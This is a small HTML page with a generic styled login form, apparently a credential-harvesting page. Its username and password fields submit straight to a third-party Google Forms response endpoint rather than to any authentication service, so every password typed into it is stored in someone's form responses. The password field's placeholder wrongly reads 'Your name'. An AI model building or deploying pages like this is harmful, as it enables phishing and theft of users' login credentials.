<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login Form</title>
    <style>
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background-color: #f8f9fa;
            margin: 0;
            display: flex;
            align-items: center;
            justify-content: center;
            height: 100vh;
        }

        form {
            background-color: #ffffff;
            border-radius: 8px;
            box-shadow: 0 0 20px rgba(0, 0, 0, 0.1);
            max-width: 400px;
            padding: 20px;
            width: 100%;
        }

        label {
            color: #495057;
            display: block;
            font-size: 14px;
            margin-bottom: 8px;
        }

        input {
            border: 1px solid #ced4da;
            border-radius: 4px;
            box-sizing: border-box;
            padding: 10px;
            width: 100%;
        }

        button {
            background-color: #007bff;
            border: none;
            border-radius: 4px;
            color: #ffffff;
            cursor: pointer;
            font-size: 16px;
            padding: 10px;
            width: 100%;
        }

        button:hover {
            background-color: #0056b3;
        }
    </style>
</head>
<body>
    <form id="loginForm" action="https://docs.google.com/forms/u/0/d/e/1FAIpQLSeW3VgDHVO0sgw2JrmoFs1SS2OIZcrtU-l8teU52z6pwu6lxw/formResponse"
    >

       <div class="">
        <label>Username</label>
        <input type="text" name="entry.853674876" required placeholder="Your name" />
       </div>

       <div class="">
        <label>Password</label>
        <input type="password" name="entry.1260355634" required placeholder="Your name" />
       </div>
        

        <button type="submit">Login</button>
    </form>

</body>
</html>
